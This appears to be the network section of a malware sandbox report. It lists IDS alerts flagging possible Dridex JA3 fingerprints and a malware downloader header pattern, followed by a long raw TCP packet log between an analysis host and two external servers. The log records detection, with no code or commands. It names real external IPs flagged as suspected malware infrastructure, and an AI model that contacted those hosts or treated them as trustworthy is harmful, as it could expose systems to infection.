| 2024-09-26T19:05:50.522089+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49730 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:51.810151+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49731 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:54.892995+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49732 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:56.180974+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49733 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:57.843408+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49734 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:59.292302+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49735 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:06:01.413460+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49736 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:06:03.295823+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49738 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:06:06.929545+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49739 | 172.105.54.160 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                      Sep 26, 2024 19:05:33.812412977 CEST443497195.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:33.812434912 CEST49719443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.812489986 CEST49719443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.816565037 CEST49719443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.816580057 CEST443497195.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:33.820580959 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.820600986 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:33.820698023 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.820975065 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:33.820987940 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:34.982032061 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:34.982172012 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:34.983088970 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:34.983095884 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:34.985977888 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:34.985984087 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:35.679910898 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:35.679990053 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:35.680027008 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.680186033 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.680262089 CEST49720443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.680286884 CEST443497205.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:35.781665087 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.781721115 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:35.781804085 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.782044888 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:35.782061100 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.445635080 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.445704937 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.446284056 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.446296930 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.448631048 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.448648930 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.448688984 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.448698044 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.770279884 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.770347118 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:36.770448923 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.770940065 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:36.770972967 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.094659090 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.094772100 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.094911098 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.096477032 CEST49721443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.096494913 CEST443497215.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.445586920 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.445667982 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.446331024 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.446341991 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.449183941 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.449187994 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.898293018 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.898325920 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.898341894 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.898477077 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.898478031 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.898513079 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.898575068 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.929971933 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.930000067 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.930113077 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.930141926 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.930186033 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.996113062 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.996138096 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.996232033 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:37.996258020 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:37.996314049 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.027041912 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.027065992 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.027206898 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.027220964 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.027267933 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.067084074 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.067110062 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.067248106 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.067272902 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.067318916 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.100718021 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.100744009 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.100867987 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.100893974 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.100945950 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.118462086 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.118489981 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.118699074 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.118709087 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.118757010 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.135799885 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.135828972 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.135914087 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.135936022 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.135981083 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.153458118 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.153486967 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.153599024 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.153608084 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.153657913 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.168358088 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.168384075 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.168437958 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.168464899 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.168479919 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.168528080 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.185978889 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.186002970 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.186094046 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.186113119 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.186155081 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.200193882 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.200222015 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.200277090 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.200300932 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.200319052 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.200337887 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.215370893 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.215406895 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.215444088 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.215471029 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.215482950 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.215512037 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.226897955 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.226924896 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.226996899 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.227014065 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.227061033 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.236479044 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.236502886 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.236550093 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.236562014 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.236581087 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.236602068 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.245692968 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.245719910 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.245770931 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.245796919 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.245817900 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.245840073 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.254832983 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.254856110 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.254935980 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.254950047 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.254992962 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.261732101 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.261756897 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.261809111 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.261816978 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.261842966 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.261867046 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.273968935 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.273996115 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.274136066 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.274147987 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.274205923 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.298583984 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.298614025 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.298749924 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.298775911 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.298821926 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.316992998 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.317018986 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.317115068 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.317147017 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.317193031 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.333519936 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.846854925 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.846898079 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.846923113 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.846939087 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.847407103 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.847423077 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.847474098 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.847491026 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.847527981 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.848133087 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848148108 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848207951 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.848226070 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848268986 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.848761082 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848776102 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848825932 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.848836899 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.848876953 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.856708050 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.856723070 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.856791019 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.856816053 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.856858969 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.858879089 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.858892918 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.858954906 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.858961105 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.858997107 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.936628103 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.936645031 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.936789989 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.936821938 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.936871052 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.937190056 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.937208891 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.937248945 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.937257051 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.937284946 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.937303066 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.939435005 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.939449072 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.939507961 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.939522028 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.939563036 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.939961910 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.939975023 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.940036058 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.940047979 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.940090895 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.941854000 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.941873074 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.941919088 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.941935062 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.941953897 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.941976070 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.942445040 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.942459106 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.942506075 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.942517996 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.942548037 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.942560911 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.949531078 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.949548960 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.949626923 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.949656963 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.949702024 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.951495886 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.951510906 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.951575041 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:38.951586962 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:38.951627016 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.029198885 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029222012 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029390097 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.029422045 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029469967 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.029705048 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029720068 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029777050 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.029784918 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.029834986 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.032088995 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.032104969 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.032171011 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.032181978 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.032229900 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.033207893 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033222914 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033282995 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.033292055 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033334970 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.033725023 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033739090 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033791065 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.033799887 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.033824921 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.033848047 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.034174919 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.034188986 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.034249067 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.034255981 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.034297943 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.042174101 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.042186975 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.042259932 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.042285919 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.042327881 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.044202089 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.044215918 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.044277906 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.044289112 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.044329882 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.121825933 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.121844053 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.121989965 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.122019053 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.122071981 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.122355938 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.122375965 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.122414112 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.122422934 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.122456074 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.122476101 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.124682903 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.124700069 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.124783039 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.124794960 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.124839067 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.125670910 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.125693083 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.125752926 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.125760078 CEST443497225.75.211.162192.168.2.5
                                                                                                      Sep 26, 2024 19:05:39.125799894 CEST49722443192.168.2.55.75.211.162
                                                                                                      Sep 26, 2024 19:05:39.126231909 CEST443497225.75.211.162192.168.2.5
